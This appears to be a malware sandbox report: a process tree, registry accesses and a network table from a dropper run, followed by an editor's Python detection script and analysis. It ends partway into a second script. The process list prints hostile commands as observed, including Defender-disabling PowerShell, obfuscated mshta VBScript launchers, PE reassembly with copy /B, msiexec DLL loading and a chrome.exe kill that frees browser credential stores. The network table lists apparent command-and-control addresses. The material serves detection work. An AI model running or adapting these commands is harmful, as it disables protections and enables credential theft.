| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe
Tue19325eb008c0b950.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe
Tue1993b3f72c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe
Tue19411ac950924ec3f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe
Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe
Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe
Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe
Tue19879c4c0e.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe
Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe
Tue193858933525b62.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe
Tue19c06f159e0ec.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe
Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe
Tue19c78ded4d176ac.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe
Tue19b4ef3b53293fe.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe
Tue192762f1cd058ddf8.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe"
C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp" /SL5="$C0156,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp" /SL5="$40206,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 488
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue193858933525b62.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
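The process list above is the most useful part of this report for detection engineering: it contains the Defender tampering (`Set-MpPreference -DisableRealtimeMonitoring`, `Add-MpPreference -ExclusionPath`), the `mshta.exe vbscript:` one-liners, the `type src > copy && start copy` re-launch trick, the `ECHO | set /P = "MZ"` plus `copy /B` reassembly of a PE from non-PE chunks, the `msiexec -Y` DLL load, and the `taskkill /f /im chrome.exe` that frees the browser's credential databases. The triage script below is an added example written for this page, not part of the sandbox report; the rule names, the regular expressions and the sample list (command lines copied from the process list, plus one Inno Setup line that should not fire) are the editor's own choices. The point it makes is that the random casing (`tYPe`, `stART`) and the VBScript quote doubling (`""MZ""`) only defeat naive string matching, so every command line is normalized before the rules run.

```python
import re
from collections import defaultdict

# Sample input: command lines copied from the process list of this report (a constructed
# subset; the last entry is the Inno Setup unpacker and is expected to match nothing).
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true',
    r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"',
    r'"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))',
    r'"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f',
    r'"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )',
    r'"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E',
    r'msiexec -Y .\bENCc.E',
    r'cmd.exe /c taskkill /f /im chrome.exe',
    r'taskkill /f /im chrome.exe',
    r'"C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp" /SL5="$40206,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe" /SILENT',
]

# Rule names and patterns are this example's own (they are not the sandbox's signature names).
# Every pattern is applied to the output of normalize(), so it is written in lower case.
RULES = {
    # Defender tampering: real-time protection switched off, then the drop directory excluded.
    "defender_realtime_disabled": re.compile(r"set-mppreference\s+-disablerealtimemonitoring\s+\$true"),
    "defender_exclusion_added": re.compile(r"add-mppreference\s+-exclusionpath"),
    # mshta running an inline script through the vbscript: protocol handler; no .hta touches disk.
    "mshta_inline_vbscript": re.compile(r'mshta(\.exe)?"?\s+vbscript:'),
    # `type src > copy && start copy`: relaunch the payload under a fresh random name via redirection.
    "type_redirect_then_start": re.compile(r"\btype\s+\S.*?>\s*\S+\s*&&\s*start\b"),
    # ECHO | set /P = "MZ" followed by copy /B: rebuild a PE from chunks that are not PEs on their own.
    "mz_stub_reassembly": re.compile(r'set\s*/p\s*=\s*"?mz"?.*copy\s*/b'),
    # msiexec -y <file>: the signed installer calls DllRegisterServer of an arbitrary DLL.
    "msiexec_y_dll_load": re.compile(r"msiexec(\.exe)?\s+[-/]y\b"),
    # Killing the browser releases the locks on its cookie and login databases for a stealer.
    "browser_process_killed": re.compile(r'taskkill\b.*[-/]im\s+"?(chrome|msedge|firefox|opera)\.exe'),
}


def normalize(cmdline: str) -> str:
    """Lower-case, collapse whitespace and undo VBScript's doubled quotes, so that random
    casing (tYPe, stART) and quote doubling (""MZ"") do not defeat the patterns."""
    collapsed = re.sub(r"\s+", " ", cmdline.lower())
    return collapsed.replace('""', '"')


def matched_rules(cmdline: str) -> list[str]:
    """Names of all rules that fire on one command line, in RULES order."""
    text = normalize(cmdline)
    return [name for name, pattern in RULES.items() if pattern.search(text)]


def triage(cmdlines) -> dict[str, list[str]]:
    """Map each rule that fired to the original (un-normalized) command lines that triggered it."""
    hits = defaultdict(list)
    for cmdline in cmdlines:
        for name in matched_rules(cmdline):
            hits[name].append(cmdline)
    return dict(hits)


def flag_counts(cmdlines) -> dict[str, int]:
    """Rule name -> number of command lines that matched it (rules with no hits are omitted)."""
    return {name: len(lines) for name, lines in triage(cmdlines).items()}


if __name__ == "__main__":
    for name, lines in triage(SAMPLE_CMDLINES).items():
        print(f"{name}: {len(lines)} hit(s)")
        for line in lines:
            print("   ", line[:110])
```

Feeding the full process list of a sandbox run (or Sysmon Event ID 1 / 4688 command lines) through `triage()` gives a per-technique view rather than a per-process one; a host that trips `defender_realtime_disabled` together with `mz_stub_reassembly` or `msiexec_y_dll_load` within a few seconds is worth isolating without waiting for a family verdict.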
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | sayanu.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | telegka.top | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| N/A | 127.0.0.1:49318 | | tcp |
| N/A | 127.0.0.1:49320 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 72.84.118.132:8080 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 104.155.138.21:80 | telegka.top | tcp |
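Read as a whole, the network table separates into three groups: DNS lookups against 8.8.8.8, TCP sessions that follow a lookup (CDN-hosted infrastructure such as cdn.discordapp.com, iplogger.org, pastebin.com and telegka.top), and repeated direct-to-IP sessions on non-web ports (135.181.129.119:4805, 194.104.136.5:46013, 91.121.67.60:2151, 72.84.118.132:8080) that never appear with a hostname. Several names (sayanu.xyz, gcl-gb.biz, propanla.com, telegatt.top, niemannbest.me and others) are resolved but never contacted, which is what a dead or sinkholed fallback host looks like from inside the sandbox. The script below is an added example by the editor, not part of this report; it parses rows in the table's own format (tolerating the shifted columns the exporter emits for direct-to-IP rows) and pulls those three groups out. The embedded table is a constructed subset of the rows above, and the field names in the result dictionary are the editor's own.

```python
from collections import Counter
from dataclasses import dataclass

# Sample input: a subset of rows copied from the network table of this report, in the
# table's own four-column format (Country | Destination | Domain | Proto).
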